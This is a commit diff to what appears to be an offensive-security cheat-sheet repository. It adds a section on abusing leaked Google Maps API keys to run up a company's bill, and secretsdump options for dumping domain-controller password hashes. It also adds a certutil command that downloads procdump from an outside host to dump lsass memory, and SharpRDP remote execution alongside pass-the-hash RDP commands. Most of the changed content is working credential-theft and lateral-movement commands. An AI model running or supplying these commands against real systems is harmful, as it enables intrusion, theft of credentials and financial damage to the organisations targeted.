Maps API + secretsdump enabled user/pw last set + certutil mimikatz

API Key Leaks/README.md

@@ -6,6 +6,7 @@
 
 - [Tools](#tools)
 - [Exploit](#exploit)
+    - [Google Maps](#google-maps)
     - [Algolia](#algolia)
     - [AWS Access Key ID & Secret](#aws-access-key-id--secret)
     - [Slack API Token](#slack-api-token)
@@ -27,6 +28,14 @@
 
 The following commands can be used to takeover accounts or extract personnal informations from the API using the leaked token.
 
+### Google Maps 
+
+Use : https://github.com/ozguralp/gmapsapiscanner/
+
+Impact:
+* Consuming the company's monthly quota or can over-bill with unauthorized usage of this service and do financial damage to the company
+* Conduct a denial of service attack specific to the service if any limitation of maximum bill control settings exist in the Google account
+
 ### Algolia 
 
 ```powershell

Methodology and Resources/Active Directory Attack.md

@@ -489,10 +489,13 @@ secretsdump.py -system /root/SYSTEM -ntds /root/ntds.dit LOCAL
 secretsdump also works remotely
 
 ```java
-./secretsdump.py -dc-ip IP AD\administrator@domain -use-vss
+./secretsdump.py -dc-ip IP AD\administrator@domain -use-vss -pwd-last-set -user-status 
 ./secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:0f49aab58dd8fb314e268c4c6a65dfc9 -just-dc PENTESTLAB/dc\$@10.0.0.1
 ```
 
+* `-pwd-last-set`: Shows pwdLastSet attribute for each NTDS.DIT account.
+* `-user-status`: Display whether or not the user is disabled.
+
 #### Alternatives - modules
 
 Metasploit modules

Methodology and Resources/Windows - Mimikatz.md

@@ -63,8 +63,11 @@ reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLo
 Dump the lsass process.
 
 ```powershell
-C:\procdump.exe -accepteula -ma lsass.exe lsass.dmp
+# HTTP method
+certutil -urlcache -split -f http://live.sysinternals.com/procdump.exe C:\Users\Public\procdump.exe
+C:\Users\Public\procdump.exe -accepteula -ma lsass.exe lsass.dmp
 
+# SMB method
 net use Z: https://live.sysinternals.com
 Z:\procdump.exe -accepteula -ma lsass.exe lsass.dmp
 ```

Methodology and Resources/Windows - Using credentials.md

@@ -131,8 +131,15 @@ PsExec.exe  \\ordws01.cscou.lab -u DOMAIN\username -p password cmd.exe -s  # get
 
 ## RDP Remote Desktop Protocol 
 
+Abuse RDP protocol to execute commands remotely with [SharpRDP](https://github.com/0xthirteen/SharpRDP)
+
+```powershell
+SharpRDP.exe computername=target.domain command="C:\Temp\file.exe" username=domain\user password=password
+```
+
+Or connect remotely with `rdesktop`
+
 ```powershell
-python rdpcheck.py DOMAIN/username:password@10.10.10.10
 rdesktop -d DOMAIN -u username -p password 10.10.10.10 -g 70 -r disk:share=/home/user/myshare
 rdesktop -u username -p password -g 70 -r disk:share=/tmp/myshare 10.10.10.10
 # -g : the screen will take up 70% of your actual screen size
@@ -165,7 +172,7 @@ or with Metasploit
 run getgui -u admin -p 1234
 ```
 
-Then log in using xfreerdp 
+or with xfreerdp 
 
 ```powershell
 xfreerdp /u:offsec /d:win2012 /pth:88a405e17c0aa5debbc9b5679753939d /v:10.0.0.1 # pass the hash works for Server 2012 R2 / Win 8.1+
@@ -173,7 +180,6 @@ xfreerdp -u test -p 36374BD2767773A2DD4F6B010EC5EE0D 192.168.226.129 # pass the
 xfreerd /u:runner /v:10.0.0.1 # password will be asked
 ```
 
-
 ## Netuse 
 
 Windows only